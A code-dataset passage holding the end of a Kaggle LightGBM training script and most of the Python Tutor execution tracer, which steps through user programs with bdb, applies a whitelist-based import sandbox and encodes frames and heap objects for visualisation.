trn_data = lgb.Dataset(X_t, label=y_t)\n val_data = lgb.Dataset(X_valid, label=y_valid)\n evals_result = {}\n lgb_clf = lgb.train(\n lgb_params,\n trn_data,\n 100000,\n valid_sets=[trn_data, val_data],\n early_stopping_rounds=3000,\n verbose_eval=1000,\n evals_result=evals_result\n )\n p_valid += lgb_clf.predict(X_valid)\n p_test += lgb_clf.predict(X_test)\n fold_importance_df = pd.DataFrame()\n fold_importance_df[\"feature\"] = features\n fold_importance_df[\"importance\"] = lgb_clf.feature_importance()\n fold_importance_df[\"fold\"] = fold + 1\n feature_importance_df = pd.concat([feature_importance_df,\n fold_importance_df], axis=0)\n oof['predict'][val_idx] = p_valid/n_loops\n val_score = roc_auc_score(y_valid, p_valid)\n val_aucs.append(val_score)\n\n predictions[f'fold{fold+1}'] = p_test/n_loops\n\n\nmean_auc = np.mean(val_aucs)\nstd_auc = np.std(val_aucs)\nall_auc = roc_auc_score(oof['target'], oof['predict'])\nprint(f\"Mean auc: {mean_auc:.5f}, std: {std_auc:.5f}. 
All auc: {all_auc:.5f}\")\n\ncols = (feature_importance_df[[\"feature\", \"importance\"]]\n .groupby(\"feature\")\n .mean()\n .sort_values(by=\"importance\", ascending=False)[:1000].index)\nbest_features = \\\n feature_importance_df.loc[feature_importance_df.feature.isin(cols)]\n\nplt.figure(figsize=(14, 40))\nsns.barplot(x=\"importance\", y=\"feature\",\n data=best_features.sort_values(by=\"importance\", ascending=False))\nplt.title('LightGBM Features (averaged over folds)')\nplt.tight_layout()\nplt.savefig(f'lgb_importances.png')\n\n# submission\npredictions['target'] = np.mean(\n predictions[[col for col in predictions.columns\n if col not in ['ID_code', 'target']]].values,\n axis=1\n)\n# predictions.to_csv('lgb_all_predictions.csv', index=None)\nsub_df = pd.DataFrame({\"ID_code\": test_df[\"ID_code\"].values})\nsub_df[\"target\"] = predictions['target']\nsub_df.to_csv(f\"lgb_submission.csv\", index=False)\noof.to_csv(f'lgb_oof.csv', index=False)\n","repo_name":"adrienbolens/Kaggle","sub_path":"santander-customer-transaction-prediction/lgb_script.py","file_name":"lgb_script.py","file_ext":"py","file_size_in_byte":5609,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"38310731354","text":"import imp\nimport sys\nimport bdb # the KEY import here!\nimport re\nimport traceback\nimport types\n\n# TODO: use the 'six' package to smooth out Py2 and Py3 differences\nis_python3 = (sys.version_info[0] == 3)\n\n# NB: don't use cStringIO since it doesn't support unicode!!!\nif is_python3:\n import io as StringIO\n import io # expose regular io for Python3 users too\nelse:\n import StringIO\nimport pg_encoder\n\n\n# upper-bound on the number of executed lines, in order to guard against\n# infinite loops\n#MAX_EXECUTED_LINES = 300\nMAX_EXECUTED_LINES = 1000 # on 2016-05-01, I increased the limit from 300 to 1000 for Python due to popular user demand! and I also improved the warning message\n\n#DEBUG = False\nDEBUG = True\n\nBREAKPOINT_STR = '#break'\n\n# if a line starts with this string, then look for a comma-separated\n# list of variables after the colon. *hide* those variables in da trace\n#\n# 2018-06-17:\n# - now supports unix-style shell globs using the syntax in\n# https://docs.python.org/3/library/fnmatch.html so you can write things\n# like '#pythontutor_hide: _*' to hide all private instance variables\n# - also now filters class and instance fields in addition to top-level vars\nPYTUTOR_HIDE_STR = '#pythontutor_hide:'\n# 2018-06-17: a comma-separated list of types that should be displayed *inline*\n# like primitives, with their actual values HIDDEN to save space. 
for details\n# of what types are legal to specify, see:\n# pg_encoder.py:should_inline_object_by_type()\n# - also accepts shell globs, just like PYTUTOR_HIDE_STR\nPYTUTOR_INLINE_TYPE_STR = '#pythontutor_hide_type:'\n\nCLASS_RE = re.compile('class\\s+')\n\n# copied-pasted from translate() in https://github.com/python/cpython/blob/2.7/Lib/fnmatch.py\ndef globToRegex(pat):\n \"\"\"Translate a shell PATTERN to a regular expression.\n There is no way to quote meta-characters.\n \"\"\"\n\n i, n = 0, len(pat)\n res = ''\n while i < n:\n c = pat[i]\n i = i+1\n if c == '*':\n res = res + '.*'\n elif c == '?':\n res = res + '.'\n elif c == '[':\n j = i\n if j < n and pat[j] == '!':\n j = j+1\n if j < n and pat[j] == ']':\n j = j+1\n while j < n and pat[j] != ']':\n j = j+1\n if j >= n:\n res = res + '\\\\['\n else:\n stuff = pat[i:j].replace('\\\\','\\\\\\\\')\n i = j+1\n if stuff[0] == '!':\n stuff = '^' + stuff[1:]\n elif stuff[0] == '^':\n stuff = '\\\\' + stuff\n res = '%s[%s]' % (res, stuff)\n else:\n res = res + re.escape(c)\n return res + '\\Z(?ms)'\n\ndef compileGlobMatch(pattern):\n # very important to use match and *not* search!\n return re.compile(globToRegex(pattern)).match\n\n# test globToRegex and compileGlobMatch\n'''\nfor e in ('_*', '__*', '__*__', '*_$'):\n stuff = compileGlobMatch(e)\n for s in ('_test', 'test_', '_test_', '__test', '__test__'):\n print(e, s, stuff(s) is not None)\n'''\n\n\nTRY_ANACONDA_STR = '\\n\\nYou can also try \"Python 3.6 with Anaconda (experimental)\",\\nwhich is slower but lets you import many more modules.\\n'\n\n\n# simple sandboxing scheme:\n#\n# - use resource.setrlimit to deprive this process of ANY file descriptors\n# (which will cause file read/write and subprocess shell launches to fail)\n# - restrict user builtins and module imports\n# (beware that this is NOT foolproof at all ... there are known flaws!)\n#\n# ALWAYS use defense-in-depth and don't just rely on these simple mechanisms\ntry:\n import resource\n resource_module_loaded = True\nexcept ImportError:\n # Google App Engine doesn't seem to have the 'resource' module\n resource_module_loaded = False\n\n\n# From http://coreygoldberg.blogspot.com/2009/05/python-redirect-or-turn-off-stdout-and.html\nclass NullDevice():\n def write(self, s):\n pass\n\n\n# ugh, I can't figure out why in Python 2, __builtins__ seems to\n# be a dict, but in Python 3, __builtins__ seems to be a module,\n# so just handle both cases ... 
UGLY!\nif type(__builtins__) is dict:\n BUILTIN_IMPORT = __builtins__['__import__']\nelse:\n assert type(__builtins__) is types.ModuleType\n BUILTIN_IMPORT = __builtins__.__import__\n\n\n# whitelist of module imports\nALLOWED_STDLIB_MODULE_IMPORTS = ('math', 'random', 'time', 'datetime',\n 'functools', 'itertools', 'operator', 'string',\n 'collections', 're', 'json',\n 'heapq', 'bisect', 'copy', 'hashlib', 'typing',\n # the above modules were first added in 2012-09\n # and then incrementally appended to up until\n # 2016-ish (see git blame logs)\n\n # added these additional ones on 2018-06-15\n # after seeing usage logs of what users tried\n # importing a lot but we didn't support yet\n # (ignoring imports that heavily deal with\n # filesystem, networking, or 3rd-party libs)\n '__future__', 'cmath', 'decimal', 'fractions',\n 'pprint', 'calendar', 'pickle',\n 'types', 'array',\n 'locale', 'abc',\n 'doctest', 'unittest',\n )\n\n# allow users to import but don't explicitly import it since it's\n# already been done above\nOTHER_STDLIB_WHITELIST = ('StringIO', 'io')\n\n\n# Restrict imports to a whitelist\ndef __restricted_import__(*args):\n # filter args to ONLY take in real strings so that someone can't\n # subclass str and bypass the 'in' test on the next line\n args = [e for e in args if type(e) is str]\n\n all_allowed_imports = sorted(ALLOWED_STDLIB_MODULE_IMPORTS + OTHER_STDLIB_WHITELIST)\n if is_python3:\n all_allowed_imports.remove('StringIO')\n else:\n all_allowed_imports.remove('typing')\n\n if args[0] in all_allowed_imports:\n imported_mod = BUILTIN_IMPORT(*args)\n # somewhat weak protection against imported modules that contain one\n # of these troublesome builtins. again, NOTHING is foolproof ...\n # just more defense in depth :)\n #\n # unload it so that if someone attempts to reload it, then it has to be\n # loaded from the filesystem, which is (supposedly!) blocked by setrlimit\n for mod in ('os', 'sys', 'posix', 'gc'):\n if hasattr(imported_mod, mod):\n delattr(imported_mod, mod)\n\n return imported_mod\n else:\n # original error message ...\n #raise ImportError('{0} not supported'.format(args[0]))\n\n # 2017-12-06: added a better error message to tell the user what\n # modules *can* be imported in python tutor ...\n ENTRIES_PER_LINE = 6\n\n lines_to_print = []\n # adapted from https://stackoverflow.com/questions/312443/how-do-you-split-a-list-into-evenly-sized-chunks\n for i in range(0, len(all_allowed_imports), ENTRIES_PER_LINE):\n lines_to_print.append(all_allowed_imports[i:i + ENTRIES_PER_LINE])\n pretty_printed_imports = ',\\n '.join([', '.join(e) for e in lines_to_print])\n\n raise ImportError('{0} not found or not supported\\nOnly these modules can be imported:\\n {1}{2}'.format(args[0], pretty_printed_imports, TRY_ANACONDA_STR))\n\n\n# Support interactive user input by:\n#\n# 1. running the entire program up to a call to raw_input (or input in py3),\n# 2. bailing and returning a trace ending in a special 'raw_input' event,\n# 3. letting the web frontend issue a prompt to the user to grab a string,\n# 4. RE-RUNNING the whole program with that string added to input_string_queue,\n# 5. 
which should bring execution to the next raw_input call (if\n# available), or to termination.\n# Repeat until no more raw_input calls are encountered.\n# Note that this is mad inefficient, but is simple to implement!\n\n# VERY IMPORTANT -- set random seed to 0 to ensure deterministic execution:\nimport random\nrandom.seed(0)\n\n# queue of input strings passed from either raw_input or mouse_input\ninput_string_queue = []\n\n\ndef open_wrapper(*args):\n if is_python3:\n raise Exception('''open() is not supported by Python Tutor.\nInstead use io.StringIO() to simulate a file.\nExample: http://goo.gl/uNvBGl''' + TRY_ANACONDA_STR)\n else:\n raise Exception('''open() is not supported by Python Tutor.\nInstead use StringIO.StringIO() to simulate a file.\nExample: http://goo.gl/Q9xQ4p''' + TRY_ANACONDA_STR)\n\n# create a more sensible error message for unsupported features\ndef create_banned_builtins_wrapper(fn_name):\n def err_func(*args):\n raise Exception(\"'\" + fn_name + \"' is not supported by Python Tutor.\" + TRY_ANACONDA_STR)\n return err_func\n\n\nclass RawInputException(Exception):\n pass\n\ndef raw_input_wrapper(prompt=''):\n if input_string_queue:\n input_str = input_string_queue.pop(0)\n\n # write the prompt and user input to stdout, to emulate what happens\n # at the terminal\n sys.stdout.write(str(prompt)) # always convert prompt into a string\n sys.stdout.write(input_str + \"\\n\") # newline to simulate the user hitting Enter\n return input_str\n raise RawInputException(str(prompt)) # always convert prompt into a string\n\n\n# Python 2 input() does eval(raw_input())\ndef python2_input_wrapper(prompt=''):\n if input_string_queue:\n input_str = input_string_queue.pop(0)\n\n # write the prompt and user input to stdout, to emulate what happens\n # at the terminal\n sys.stdout.write(str(prompt)) # always convert prompt into a string\n sys.stdout.write(input_str + \"\\n\") # newline to simulate the user hitting Enter\n return eval(input_str) # remember to eval!\n raise RawInputException(str(prompt)) # always convert prompt into a string\n\nclass MouseInputException(Exception):\n pass\n\ndef mouse_input_wrapper(prompt=''):\n if input_string_queue:\n return input_string_queue.pop(0)\n raise MouseInputException(prompt)\n\n\n# blacklist of builtins\nBANNED_BUILTINS = [] # 2018-06-15 don't ban any builtins since that's just security by obscurity\n # we should rely on other layered security mechanisms\n\n# old banned built-ins prior to 2018-06-15\n#BANNED_BUILTINS = ['reload', 'open', 'compile',\n# 'file', 'eval', 'exec', 'execfile',\n# 'exit', 'quit', 'help',\n# 'dir', 'globals', 'locals', 'vars']\n# Peter says 'apply' isn't dangerous, so don't ban it\n\nIGNORE_VARS = set(('__builtins__', '__name__', '__exception__', '__doc__', '__package__'))\n\n\n'''\n2013-12-26\n\nOkay, what's with this f_valuestack business?\n\nIf you compile your own CPython and patch Objects/frameobject.c to add a\nPython accessor for f_valuestack, then you can actually access the value\nstack, which is useful for, say, grabbbing the objects within\nlist/set/dict comprehensions as they're being built. 
e.g., try:\n\n z = [x*y for x in range(5) for y in range(5)]\n\nNote that on pythontutor.com, I am currently running custom-compiled\nversions of Python-2.7.6 and Python-3.3.3 with this f_valuestack hack.\nUnless you run your own custom CPython, you won't get these benefits.\n- update as of 2018-06-16: I don't think the above has been true for a while\n\n\nPatch:\n\n static PyObject *\n frame_getlineno(PyFrameObject *f, void *closure)\n {\n return PyLong_FromLong(PyFrame_GetLineNumber(f));\n }\n\n+// copied from Py2crazy, which was for Python 2, but let's hope this still works!\n+static PyObject *\n+frame_getvaluestack(PyFrameObject* f) {\n+ // pgbovine - TODO: will this memory leak? hopefully not,\n+ // since all other accessors seem to follow the same idiom\n+ PyObject* lst = PyList_New(0);\n+ if (f->f_stacktop != NULL) {\n+ PyObject** p = NULL;\n+ for (p = f->f_valuestack; p < f->f_stacktop; p++) {\n+ PyList_Append(lst, *p);\n+ }\n+ }\n+\n+ return lst;\n+}\n+\n /* Setter for f_lineno - you can set f_lineno from within a trace function in\n * order to jump to a given line of code, subject to some restrictions. Most\n * lines are OK to jump to because they don't make any assumptions about the\n@@ -368,6 +384,11 @@\n\n static PyGetSetDef frame_getsetlist[] = {\n {\"f_locals\", (getter)frame_getlocals, NULL, NULL},\n {\"f_lineno\", (getter)frame_getlineno,\n (setter)frame_setlineno, NULL},\n {\"f_trace\", (getter)frame_gettrace, (setter)frame_settrace, NULL},\n+\n+ // pgbovine\n+ {\"f_valuestack\",(getter)frame_getvaluestack,\n+ (setter)NULL /* don't let it be set */, NULL},\n+\n {0}\n };\n'''\n\n# at_global_scope should be true only if 'frame' represents the global scope\ndef get_user_globals(frame, at_global_scope=False):\n d = filter_var_dict(frame.f_globals)\n\n # don't blurt out all of f_valuestack for now ...\n '''\n if at_global_scope and hasattr(frame, 'f_valuestack'):\n for (i, e) in enumerate(frame.f_valuestack):\n d['_tmp' + str(i+1)] = e\n '''\n\n # print out list objects being built up in Python 2.x list comprehensions\n # (which don't have its own special frame, sadly)\n if not is_python3 and hasattr(frame, 'f_valuestack'):\n for (i, e) in enumerate([e for e in frame.f_valuestack if type(e) is list]):\n d['_tmp' + str(i+1)] = e\n\n # also filter out __return__ for globals only, but NOT for locals\n if '__return__' in d:\n del d['__return__']\n return d\n\ndef get_user_locals(frame):\n ret = filter_var_dict(frame.f_locals)\n # don't blurt out all of f_valuestack for now ...\n '''\n if hasattr(frame, 'f_valuestack'):\n for (i, e) in enumerate(frame.f_valuestack):\n ret['_tmp' + str(i+1)] = e\n '''\n\n # special printing of list/set/dict comprehension objects as they are\n # being built up incrementally ...\n f_name = frame.f_code.co_name\n if hasattr(frame, 'f_valuestack'):\n # print out list objects being built up in Python 2.x list comprehensions\n # (which don't have its own special frame, sadly)\n if not is_python3:\n for (i, e) in enumerate([e for e in frame.f_valuestack\n if type(e) is list]):\n ret['_tmp' + str(i+1)] = e\n\n # for dict and set comprehensions, which have their own frames:\n if f_name.endswith('comp>'):\n for (i, e) in enumerate([e for e in frame.f_valuestack\n if type(e) in (list, set, dict)]):\n ret['_tmp' + str(i+1)] = e\n\n return ret\n\ndef filter_var_dict(d):\n ret = {}\n for (k,v) in d.items():\n if k not in IGNORE_VARS:\n ret[k] = v\n return ret\n\n\n# yield all function objects locally-reachable from frame,\n# making sure to traverse inside all 
compound objects ...\ndef visit_all_locally_reachable_function_objs(frame):\n for (k, v) in get_user_locals(frame).items():\n for e in visit_function_obj(v, set()):\n if e: # only non-null if it's a function object\n assert type(e) in (types.FunctionType, types.MethodType)\n yield e\n\n\n# TODO: this might be slow if we're traversing inside lots of objects:\ndef visit_function_obj(v, ids_seen_set):\n v_id = id(v)\n\n # to prevent infinite loop\n if v_id in ids_seen_set:\n yield None\n else:\n ids_seen_set.add(v_id)\n\n typ = type(v)\n \n # simple base case\n if typ in (types.FunctionType, types.MethodType):\n yield v\n\n # recursive cases\n elif typ in (list, tuple, set):\n for child in v:\n for child_res in visit_function_obj(child, ids_seen_set):\n yield child_res\n\n elif typ == dict or pg_encoder.is_class(v) or pg_encoder.is_instance(v):\n contents_dict = None\n\n if typ == dict:\n contents_dict = v\n # warning: some classes or instances don't have __dict__ attributes\n elif hasattr(v, '__dict__'):\n contents_dict = v.__dict__\n\n if contents_dict:\n for (key_child, val_child) in contents_dict.items():\n for key_child_res in visit_function_obj(key_child, ids_seen_set):\n yield key_child_res\n for val_child_res in visit_function_obj(val_child, ids_seen_set):\n yield val_child_res\n\n # degenerate base case\n yield None\n\n\nclass PGLogger(bdb.Bdb):\n # if custom_modules is non-empty, it should be a dict mapping module\n # names to the python source code of each module. when _runscript is\n # called, it will do \"from import *\" for all modules in\n # custom_modules before running the user's script and then trace all\n # code within custom_modules\n #\n # if separate_stdout_by_module, then have a separate stdout stream\n # for each module rather than all stdout going to a single stream\n def __init__(self, cumulative_mode, heap_primitives, show_only_outputs, finalizer_func,\n disable_security_checks=False, allow_all_modules=False, crazy_mode=False,\n custom_modules=None, separate_stdout_by_module=False, probe_exprs=None):\n bdb.Bdb.__init__(self)\n self.mainpyfile = ''\n self._wait_for_mainpyfile = 0\n\n if probe_exprs:\n self.probe_exprs = probe_exprs\n else:\n self.probe_exprs = None\n\n self.separate_stdout_by_module = separate_stdout_by_module\n self.stdout_by_module = {} # Key: module name, Value: StringIO faux-stdout\n\n self.modules_to_trace = set(['__main__']) # always trace __main__!\n\n # Key: module name\n # Value: module's python code as a string\n self.custom_modules = custom_modules\n if self.custom_modules:\n for module_name in self.custom_modules:\n self.modules_to_trace.add(module_name)\n\n self.disable_security_checks = disable_security_checks\n self.allow_all_modules = allow_all_modules\n # if we allow all modules, we shouldn't do security checks\n # either since otherwise users can't really import anything\n # because that will likely involve opening files on disk, which\n # is disallowed by security checks\n if self.allow_all_modules:\n self.disable_security_checks = True\n\n # if True, then displays ALL stack frames that have ever existed\n # rather than only those currently on the stack (and their\n # lexical parents)\n self.cumulative_mode = cumulative_mode\n\n # if True, then render certain primitive objects as heap objects\n self.render_heap_primitives = heap_primitives\n\n # if True, then don't render any data structures in the trace,\n # and show only outputs\n self.show_only_outputs = show_only_outputs\n\n # Run using the custom Py2crazy Python interpreter\n 
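# (note, inferred from the crazy_mode uses later in this file rather than\n    # from any upstream docs: when True, interaction() reads frame.f_colno and\n    # frame.f_lasti, and _runscript() builds self.bytecode_map via super_dis,\n    # so that column-level info can be attached to each trace entry; a stock\n    # CPython frame has no f_colno attribute, so this flag must stay False\n    # unless running under the patched Py2crazy interpreter)\n    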
self.crazy_mode = crazy_mode\n\n # a function that takes the output trace as a parameter and\n # processes it\n self.finalizer_func = finalizer_func\n\n # each entry contains a dict with the information for a single\n # executed line\n self.trace = []\n\n # if this is true, don't put any more stuff into self.trace\n self.done = False\n\n # if this is non-null, don't do any more tracing until a\n # 'return' instruction with a stack gotten from\n # get_stack_code_IDs() that matches wait_for_return_stack\n self.wait_for_return_stack = None\n\n #http://stackoverflow.com/questions/2112396/in-python-in-google-app-engine-how-do-you-capture-output-produced-by-the-print\n self.GAE_STDOUT = sys.stdout\n\n # Key: function object\n # Value: parent frame\n self.closures = {}\n\n # Key: code object for a lambda\n # Value: parent frame\n self.lambda_closures = {}\n\n # set of function objects that were defined in the global scope\n self.globally_defined_funcs = set()\n\n # Key: frame object\n # Value: monotonically increasing small ID, based on call order\n self.frame_ordered_ids = {}\n self.cur_frame_id = 1\n\n # List of frames to KEEP AROUND after the function exits.\n # If cumulative_mode is True, then keep ALL frames in\n # zombie_frames; otherwise keep only frames where\n # nested functions were defined within them.\n self.zombie_frames = []\n\n # set of elements within zombie_frames that are also\n # LEXICAL PARENTS of other frames\n self.parent_frames_set = set()\n\n # all globals that ever appeared in the program, in the order in\n # which they appeared. note that this might be a superset of all\n # the globals that exist at any particular execution point,\n # since globals might have been deleted (using, say, 'del')\n self.all_globals_in_order = []\n\n # very important for this single object to persist throughout\n # execution, or else canonical small IDs won't be consistent.\n self.encoder = pg_encoder.ObjectEncoder(self)\n\n self.executed_script = None # Python script to be executed!\n\n # if there is at least one line that ends with BREAKPOINT_STR,\n # then activate \"breakpoint mode\", where execution should stop\n # ONLY at breakpoint lines.\n self.breakpoints = []\n\n self.vars_to_hide = set() # a set of regex match objects\n # created by compileGlobMatch() from\n # the contents of PYTUTOR_HIDE_STR\n self.types_to_inline = set() # a set of regex match objects derived from PYTUTOR_INLINE_TYPE_STR\n\n self.prev_lineno = -1 # keep track of previous line just executed\n\n\n def should_hide_var(self, var):\n for re_match in self.vars_to_hide:\n if re_match(var):\n return True\n return False\n\n\n def get_user_stdout(self):\n def encode_stringio(sio):\n # This is SUPER KRAZY! In Python 2, the buflist inside of a StringIO\n # instance can be made up of both str and unicode, so we need to convert\n # the str to unicode and replace invalid characters with the Unicode '?'\n # But leave unicode elements alone. This way, EVERYTHING inside buflist\n # will be unicode. 
(Note that in Python 3, everything is already unicode,\n # so we're fine.)\n if not is_python3:\n sio.buflist = [(e.decode('utf-8', 'replace')\n if type(e) is str\n else e)\n for e in sio.buflist]\n return sio.getvalue()\n\n if self.separate_stdout_by_module:\n ret = {}\n for module_name in self.stdout_by_module:\n ret[module_name] = encode_stringio(self.stdout_by_module[module_name])\n return ret\n else:\n # common case - single stdout stream\n return encode_stringio(self.user_stdout)\n\n\n def get_frame_id(self, cur_frame):\n return self.frame_ordered_ids[cur_frame]\n\n # Returns the (lexical) parent of a function value.\n def get_parent_of_function(self, val):\n if val in self.closures:\n return self.get_frame_id(self.closures[val])\n elif val in self.lambda_closures:\n return self.get_frame_id(self.lambda_closures[val])\n else:\n return None\n\n\n # Returns the (lexical) parent frame of the function that was called\n # to create the stack frame 'frame'.\n #\n # OKAY, this is a SUPER hack, but I don't see a way around it\n # since it's impossible to tell exactly which function\n # ('closure') object was called to create 'frame'.\n #\n # The Python interpreter doesn't maintain this information,\n # so unless we hack the interpreter, we will simply have\n # to make an educated guess based on the contents of local\n # variables inherited from possible parent frame candidates.\n def get_parent_frame(self, frame):\n #print >> sys.stderr, 'get_parent_frame: frame.f_code', frame.f_code\n for (func_obj, parent_frame) in self.closures.items():\n # ok, there's a possible match, but let's compare the\n # local variables in parent_frame to those of frame\n # to make sure. this is a hack that happens to work because in\n # Python, each stack frame inherits ('inlines') a copy of the\n # variables from its (lexical) parent frame.\n if func_obj.__code__ == frame.f_code:\n all_matched = True\n for k in frame.f_locals:\n # Do not try to match local names\n if k in frame.f_code.co_varnames:\n continue\n if k != '__return__' and k in parent_frame.f_locals:\n if parent_frame.f_locals[k] != frame.f_locals[k]:\n all_matched = False\n break\n\n if all_matched:\n return parent_frame\n\n for (lambda_code_obj, parent_frame) in self.lambda_closures.items():\n if lambda_code_obj == frame.f_code:\n # TODO: should we do more verification like above?!?\n return parent_frame\n\n return None\n\n\n def lookup_zombie_frame_by_id(self, frame_id):\n # TODO: kinda inefficient\n for e in self.zombie_frames:\n if self.get_frame_id(e) == frame_id:\n return e\n assert False # should never get here\n\n\n # unused ...\n #def reset(self):\n # bdb.Bdb.reset(self)\n # self.forget()\n\n\n def forget(self):\n self.lineno = None\n self.stack = []\n self.curindex = 0\n self.curframe = None\n\n def setup(self, f, t):\n self.forget()\n self.stack, self.curindex = self.get_stack(f, t)\n self.curframe = self.stack[self.curindex][0]\n\n # should be a reasonably unique ID to match calls and returns:\n def get_stack_code_IDs(self):\n return [id(e[0].f_code) for e in self.stack]\n\n\n # Override Bdb methods\n\n def user_call(self, frame, argument_list):\n \"\"\"This method is called when there is the remote possibility\n that we ever need to stop in this function.\"\"\"\n # TODO: figure out a way to move this down to 'def interaction'\n # or right before self.trace.append ...\n if self.done: return\n\n if self._wait_for_mainpyfile:\n return\n if self.stop_here(frame):\n # delete __return__ so that on subsequent calls to\n # a generator function, 
the OLD yielded (returned)\n # value gets deleted from the frame ...\n try:\n del frame.f_locals['__return__']\n except KeyError:\n pass\n\n self.interaction(frame, None, 'call')\n\n def user_line(self, frame):\n \"\"\"This function is called when we stop or break at this line.\"\"\"\n if self.done: return\n\n if self._wait_for_mainpyfile:\n if ((frame.f_globals['__name__'] not in self.modules_to_trace) or\n frame.f_lineno <= 0):\n # older code:\n #if (self.canonic(frame.f_code.co_filename) != \"\" or\n # frame.f_lineno <= 0):\n return\n self._wait_for_mainpyfile = 0\n self.interaction(frame, None, 'step_line')\n\n def user_return(self, frame, return_value):\n \"\"\"This function is called when a return trap is set here.\"\"\"\n if self.done: return\n\n frame.f_locals['__return__'] = return_value\n self.interaction(frame, None, 'return')\n\n def user_exception(self, frame, exc_info):\n \"\"\"This function is called if an exception occurs,\n but only if we are to stop at or just below this level.\"\"\"\n if self.done: return\n\n exc_type, exc_value, exc_traceback = exc_info\n frame.f_locals['__exception__'] = exc_type, exc_value\n if type(exc_type) == type(''):\n exc_type_name = exc_type\n else: exc_type_name = exc_type.__name__\n\n if exc_type_name == 'RawInputException':\n raw_input_arg = str(exc_value.args[0]) # make sure it's a string so it's JSON serializable!\n self.trace.append(dict(event='raw_input', prompt=raw_input_arg))\n self.done = True\n elif exc_type_name == 'MouseInputException':\n mouse_input_arg = str(exc_value.args[0]) # make sure it's a string so it's JSON serializable!\n self.trace.append(dict(event='mouse_input', prompt=mouse_input_arg))\n self.done = True\n else:\n self.interaction(frame, exc_traceback, 'exception')\n\n def get_script_line(self, n):\n return self.executed_script_lines[n-1]\n\n # General interaction function\n\n def interaction(self, frame, traceback, event_type):\n self.setup(frame, traceback)\n tos = self.stack[self.curindex]\n top_frame = tos[0]\n lineno = tos[1]\n\n topframe_module = top_frame.f_globals['__name__']\n\n # debug ...\n '''\n print >> sys.stderr\n print >> sys.stderr, '=== STACK ===', 'curindex:', self.curindex\n for (e,ln) in self.stack:\n print >> sys.stderr, e.f_code.co_name + ' ' + e.f_code.co_filename + ' ' + str(ln)\n print >> sys.stderr, \"top_frame\", top_frame.f_code.co_name, top_frame.f_code\n '''\n\n\n # don't trace inside of ANY functions that aren't user-written code\n # (e.g., those from imported modules -- e.g., random, re -- or the\n # __restricted_import__ function in this file)\n #\n # empirically, it seems like the FIRST entry in self.stack is\n # the 'run' function from bdb.py, but everything else on the\n # stack is the user program's \"real stack\"\n\n # Look only at the \"topmost\" frame on the stack ...\n\n # if we're not in a module that we are explicitly tracing, skip:\n # (this comes up in tests/backend-tests/namedtuple.txt)\n if topframe_module not in self.modules_to_trace:\n return\n # also don't trace inside of the magic \"constructor\" code\n if top_frame.f_code.co_name == '__new__':\n return\n # or __repr__, which is often called when running print statements\n if top_frame.f_code.co_name == '__repr__':\n return\n\n # don't trace if wait_for_return_stack is non-null ...\n if self.wait_for_return_stack:\n if event_type == 'return' and \\\n (self.wait_for_return_stack == self.get_stack_code_IDs()):\n self.wait_for_return_stack = None # reset!\n return # always bail!\n else:\n # Skip all \"calls\" that are 
actually class definitions, since\n # those faux calls produce lots of ugly cruft in the trace.\n #\n # NB: Only trigger on calls to functions defined in\n # user-written code (i.e., co_filename == ''), but that\n # should already be ensured by the above check for whether we're\n # in user-written code.\n if event_type == 'call':\n first_lineno = top_frame.f_code.co_firstlineno\n if topframe_module == \"__main__\":\n func_line = self.get_script_line(first_lineno)\n elif topframe_module in self.custom_modules:\n module_code = self.custom_modules[topframe_module]\n module_code_lines = module_code.splitlines() # TODO: maybe pre-split lines?\n func_line = module_code_lines[first_lineno-1]\n else:\n # you're hosed\n func_line = ''\n #print >> sys.stderr, func_line\n\n if CLASS_RE.match(func_line.lstrip()): # ignore leading spaces\n self.wait_for_return_stack = self.get_stack_code_IDs()\n return\n\n\n self.encoder.reset_heap() # VERY VERY VERY IMPORTANT,\n # or else we won't properly capture heap object mutations in the trace!\n\n if event_type == 'call':\n # Don't be so strict about this assertion because it FAILS\n # when you're calling a generator (not for the first time),\n # since that frame has already previously been on the stack ...\n #assert top_frame not in self.frame_ordered_ids\n\n self.frame_ordered_ids[top_frame] = self.cur_frame_id\n self.cur_frame_id += 1\n\n if self.cumulative_mode:\n self.zombie_frames.append(top_frame)\n\n # kinda tricky to get the timing right -- basically, as soon as you\n # make a call, set sys.stdout to the stream for the appropriate\n # module, and as soon as you return, set sys.stdout to the\n # stream for your caller's module. we need to do this on the\n # return call since we want to immediately start picking up\n # prints to stdout *right after* this function returns\n if self.separate_stdout_by_module:\n if event_type == 'call':\n if topframe_module in self.stdout_by_module:\n sys.stdout = self.stdout_by_module[topframe_module]\n else:\n sys.stdout = self.stdout_by_module[\"\"]\n elif event_type == 'return' and self.curindex > 0:\n prev_tos = self.stack[self.curindex - 1]\n prev_topframe = prev_tos[0]\n prev_topframe_module = prev_topframe.f_globals['__name__']\n if prev_topframe_module in self.stdout_by_module:\n sys.stdout = self.stdout_by_module[prev_topframe_module]\n else:\n sys.stdout = self.stdout_by_module[\"\"]\n\n\n # only render zombie frames that are NO LONGER on the stack\n #\n # subtle: self.stack[:self.curindex+1] is the real stack, since\n # everything after self.curindex+1 is beyond the top of the\n # stack. 
this seems to be relevant only when there's an exception,\n # since the ENTIRE stack is preserved but self.curindex\n # starts decrementing as the exception bubbles up the stack.\n cur_stack_frames = [e[0] for e in self.stack[:self.curindex+1]]\n zombie_frames_to_render = [e for e in self.zombie_frames if e not in cur_stack_frames]\n\n\n # each element is a pair of (function name, ENCODED locals dict)\n encoded_stack_locals = []\n\n\n # returns a dict with keys: function name, frame id, id of parent frame, encoded_locals dict\n def create_encoded_stack_entry(cur_frame):\n #print >> sys.stderr, '- create_encoded_stack_entry', cur_frame, self.closures, self.lambda_closures\n ret = {}\n\n\n parent_frame_id_list = []\n\n f = cur_frame\n while True:\n p = self.get_parent_frame(f)\n if p:\n pid = self.get_frame_id(p)\n assert pid\n parent_frame_id_list.append(pid)\n f = p\n else:\n break\n\n\n cur_name = cur_frame.f_code.co_name\n\n if cur_name == '':\n cur_name = 'unnamed function'\n\n # augment lambdas with line number\n if cur_name == '':\n cur_name += pg_encoder.create_lambda_line_number(cur_frame.f_code,\n self.encoder.line_to_lambda_code)\n\n # encode in a JSON-friendly format now, in order to prevent ill\n # effects of aliasing later down the line ...\n encoded_locals = {}\n\n for (k, v) in get_user_locals(cur_frame).items():\n is_in_parent_frame = False\n\n # don't display locals that appear in your parents' stack frames,\n # since that's redundant\n for pid in parent_frame_id_list:\n parent_frame = self.lookup_zombie_frame_by_id(pid)\n if k in parent_frame.f_locals:\n # ignore __return__, which is never copied\n if k != '__return__':\n # these values SHOULD BE ALIASES\n # (don't do an 'is' check since it might not fire for primitives)\n if parent_frame.f_locals[k] == v:\n 